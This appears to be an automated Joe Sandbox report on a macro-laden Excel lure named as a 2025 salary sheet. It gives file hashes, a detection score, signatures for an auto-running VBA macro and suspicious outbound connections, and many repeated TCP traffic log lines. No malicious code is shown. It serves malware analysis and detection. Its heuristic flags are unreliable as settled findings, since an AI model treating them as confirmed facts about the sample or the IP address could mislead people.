Edit tour

Windows Analysis Report
Salary 2025- workers-v1.xls

Overview

General Information

Sample name:	Salary 2025- workers-v1.xls
Analysis ID:	1559179
MD5:	db0d2d8342343528bb33649e91bb6f3d
SHA1:	7e00d44d5b05912a2e42c5408fefed8396710b24
SHA256:	abd87359790b24e8ac8464d3af8688b08248ca84c14dd97f1b6f33e8c297a3b8
Infos:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Machine Learning detection for sample

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Document misses a certain OLE stream usually present in this Microsoft Office document type

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Excel Network Connections

Sigma detected: Suspicious Office Outbound Connections

Suricata IDS alerts with low severity for network traffic

Classification

Process Tree

System is w10x64_ra

EXCEL.EXE (PID: 5452 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Salary 2025- workers-v1.xls" MD5: 4A871771235598812032C822E6F68F19)

splwow64.exe (PID: 4592 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)

cleanup

Sigma Signatures

Sigma detected: Excel Network Connections

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 13.107.246.42, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 5452, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49716

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.16, DestinationIsIpv6: false, DestinationPort: 49716, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 5452, Protocol: tcp, SourceIp: 13.107.246.42, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T09:18:18.089586+0100	2028371	3	Unknown Traffic	192.168.2.16	49716	13.107.246.42	443	TCP
2024-11-20T09:18:22.918256+0100	2028371	3	Unknown Traffic	192.168.2.16	49717	13.107.246.42	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Salary 2025- workers-v1.xls

Avira: detected

Machine Learning detection for sample

Source: Salary 2025- workers-v1.xls

Joe Sandbox ML: detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 13.107.246.42:443 -> 192.168.2.16:49716 version: TLS 1.2

Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49717 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49717 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49717 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49717 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49717 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49717 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49717 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49717 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49717 -> 13.107.246.42:443

Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
